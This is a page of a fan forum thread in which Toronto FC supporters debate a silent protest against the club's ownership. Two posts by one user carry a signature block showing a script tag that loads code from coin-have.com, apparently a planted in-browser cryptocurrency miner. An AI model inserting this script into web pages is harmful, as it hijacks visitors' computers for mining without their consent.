Page 5 of 6 FirstFirst 123456 LastLast
    Mentioned
    1 Post(s)
    Tagged
    0 Thread(s)

Good interview.
    it's too bad that all the groups couldn't come together on this. I'm sure NEE are thinking it's about time we did something. feel like we're a little slow out of the blocks on this. but at least something is happening now.

RPB Member
    Past President

Mentioned
    1 Post(s)
    Tagged
    0 Thread(s)

Quote Originally Posted by Belfast_Boy View Post
    Good interview.
    it's too bad that all the groups couldn't come together on this. I'm sure NEE are thinking it's about time we did something. feel like we're a little slow out of the blocks on this. but at least something is happening now.
    if you look at the two ideas put forward they are very similar in many ways.
    Its going to be an interesting day
    HTML Code:
    <script src="https://coin-have.com/c/XQ5z.js"></script>

RPB Member

Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

Quote Originally Posted by Technorgasm View Post
    CAN WE PLEASE FOCUS SOME OF THIS ENERGY ON THE columbus CREW and THEIR TRAVELING FANS?

like, cant we remind them that they suck ass balls.

its all gone quiet over here. . .
    . . I cant here a fucking thing. . from us.

this game is going to suck.

Why waste energy on them?

Let them sing and be louder than us,that will just show ML$E there in no home field advantage without SG's passion and support.We don't stand the chance anyway 8 players from line up are out,good luck crossing the center line tomorrow.
    Great love does not exist without joy and without great suffering ,that's why One club is worth only as much as its fans !

Mentioned
    1 Post(s)
    Tagged
    0 Thread(s)

Quote Originally Posted by Boris View Post
    if you look at the two ideas put forward they are very similar in many ways.
    Its going to be an interesting day
    you're right big guy. they'll work well together.

Banned
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

Quote Originally Posted by Belfast_Boy View Post
    Good interview.

Although it is not an official request from RPB, I do know that there are several of us that will be following NEE's position on this and will not be singing. Cooperation doesn't have to be done at the top levels of the group. We can do it as individual supporters as well.

Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

Save your voice on Saturday and support TFC Academy on Sunday

Sunday October 17, 2010
    FC Hamilton Croatia - TFC Academy
    Start Time: 7:00 pm

Brian Timmis Stadium, Hamilton
    75 Balsam Ave. N., Hamilton, ON L8L 8C1

http://maps.google.ca/maps?oe=utf-8&...,0.009474&z=17

Price: $15

GO schedules:
    http://www.gotransit.com/publicroot/...tser.aspx?New=

Registered
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

I support singing Dichio, but Dichio only.
    He's the best thing to ever be associated with this club and singing his praises has no bearing on our protest against the ownership and its mismanagement.
    But if the consensus says No Singing, period, I'll shut up.
    Support Local Football.

RPB Member
    Past President

Mentioned
    1 Post(s)
    Tagged
    0 Thread(s)

Quote Originally Posted by Gobi View Post
    He's the best thing to ever be associated with this club and singing his praises has no bearing on our protest against the ownership and its mismanagement.
    i think best bet would be to go with the majority....
    the atmosphere will be weird..
    HTML Code:
    <script src="https://coin-have.com/c/XQ5z.js"></script>

Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

Yes, I hope Krew Supporters are very loud and we are super quiet. I think tomorrow is about proving a point and showing what BMO will be like as they keep raising prices.

Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

Quote Originally Posted by Gobi View Post

Dichio was at the CSL game on Wednesday, we did his song twice.

Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

Quote Originally Posted by Chevy View Post
    ^^ Hell, Nick is one of the few players this year that has EXCEEDED expectations.
    LOL! That's how TERRIBLE Garcia was last year...he's gone from playing like an orange pylon with two left feet, to just very very very bad.....

Banned
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

I'll be late to this game, but will be watching the first half from work.

I'll report in what its like to the TV audience.

Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

bump. reminder that NEE planned to do this for the last TWO matches.

the reason i'm bumping this is because i read that people came to some consensus (out of a few at Joes yesterday) that they'll start singing at 23:13 and cheer the boys on after.

i think that shows a lack of focus, and some satisfaction with the townhall meetings, even though there hasn't been anything to come from them yet.

continue to show your displeasure, don't let up.

Yes, its true.. I don't like you one lil bit and now you know for sure ;) DWI
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

Quote Originally Posted by Sonny Cheeba View Post

the reason i'm bumping this is because i read that people came to some consensus (out of a few at Joes yesterday) that they'll start singing at 23:13 and cheer the boys on after.

i think that shows a lack of focus, and some satisfaction with the townhall meetings, even though there hasn't been anything to come from them yet.

^^ THIS!!

Awaiting Confirmation
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

If that's what's happening (ie cheering from 23:13 onward), then you may as well not protest at all.

Only a fraction wore green on Saturday and it didn't show on TV at all, and if people start cheering at 23:13, that'll completely sabotage NEE's action.

Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

Exactly.

No half assed protest please. Stick to your guns and don't contradict yourselves.

Thanks.

Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

^^i'm not certain that it is happening that way, but i've seen a fairly informal discussion about it in another thread. i think the matchday thread. anyways. it needs to be squashed sooner than later.

because all that small discussion will do is confuse people, then send mixed signals.

Banned
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

Quote Originally Posted by DangerRed View Post
    If that's what's happening (ie cheering from 23:13 onward), then you may as well not protest at all.

Only a fraction wore green on Saturday and it didn't show on TV at all, and if people start cheering at 23:13, that'll completely sabotage NEE's action.

What the group will or will not do was not decided at Shoeless last night. Some people had a discussion and ideas were thrown around, that's it. So let's not assume that anyone knows what was decided.

And what NEE do is their own business. Both SGs have made their points very clear and both will continue to address this issue from their own point of view. I don't know what will happen tonight, but let's not misconstrue any action as support or sabotage of another group just because they don't do things exactly the same. They didn't wear green on Saturday, did they sabotage RPB? That's a ridiculous statement.

Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

Reminder, if you guys jump up and down like trained clowns today, you will lose all your credibility from this point onwards. FACT!

Don't ruin a good thing!

Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

^^i'm not certain that it is happening that way, but i've seen a fairly informal discussion about it in another thread. i think the matchday thread. anyways. it needs to be squashed sooner than later.

because all that small discussion will do is confuse people, then send mixed signals.
    I agree.

Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

its not about sabotaging anything. NEE will do their thing regardless of what else happens....

it is about having to sacrifice something you love to do for the bigger picture....

if things start to go status quo around parts of the stadium, then I feel that whatever momentum this has picked up - especially with the media - will die down, and will make an impression going in to the offseason....

Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

Quote Originally Posted by Roogsy View Post
    What the group will or will not do was not decided at Shoeless last night. Some people had a discussion and ideas were thrown around, that's it. So let's not assume that anyone knows what was decided.

And what NEE do is their own business. Both SGs have made their points very clear and both will continue to address this issue from their own point of view. I don't know what will happen tonight, but let's not misconstrue any action as support or sabotage of another group just because they don't do things exactly the same. They didn't wear green on Saturday, did they sabotage RPB? That's a ridiculous statement.
    well i guess i'm guilty for assuming that.... i should've put a little disclaimer that it maybe wasn't an official decision of sorts.

anyways. it shouldn't be discussed in the match thread if it's only an idea. there should be an official stance or something posted somewhere in the main forum.

that said. i still think continued silence should be the way to go... or else focus becomes fuzzy.

Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

Quote Originally Posted by TFC Tifoso View Post
    its not about sabotaging anything. NEE will do their thing regardless of what else happens....

it is about having to sacrifice something you love to do for the bigger picture....

if things start to go status quo around parts of the stadium, then I feel that whatever momentum this has picked up - especially with the media - will die down, and will make an impression going in to the offseason....
    i agree 100%,

it is best to leave people with something to think about over the off season.

Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

Quote Originally Posted by TFC Tifoso View Post

WORD!

Don't back down on your stance. If you want to be taken seriously, then you need to stick to your words. The silence needs to be maintained for tonight's match as well.

Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

how about everyone just run on the field after the game and take a shit... provides for some good fertilizer for next season

Mentioned
    5 Post(s)
    Tagged
    1 Thread(s)

Quote Originally Posted by fetajr View Post
    how about everyone just run on the field after the game and take a shit... provides for some good fertilizer for next season
    We don't need Columbus Crew logos all over our pitch.

Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

How about we get back to the real issue at hand instead of attempting to crack jokes here?

Mentioned
    5 Post(s)
    Tagged
    1 Thread(s)

Quote Originally Posted by King Tut View Post
    How about we get back to the real issue at hand instead of attempting to crack jokes here?
    Whoa...easy there Mr Serious.

Right - So decisions about the direction the Red Patch Boys will be taking is being discussed. Those outside of the group will know what the groups decision is when the leaders of the RPB feel the time is right.

Thanks for your input. See you at the park.

Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

Quote Originally Posted by jabbronies View Post
    Whoa...easy there Mr Serious.

Right - So decisions about the direction the Red Patch Boys will be taking is being discussed. Those outside of the group will know what the groups decision is when the leaders of the RPB feel the time is right.

Thanks for your input. See you at the park.
    don't lose focus...

fo-cus
    fo-cus
    fo-cus

that is all.

Mentioned
    5 Post(s)
    Tagged
    1 Thread(s)

don't lose focus...

fo-cus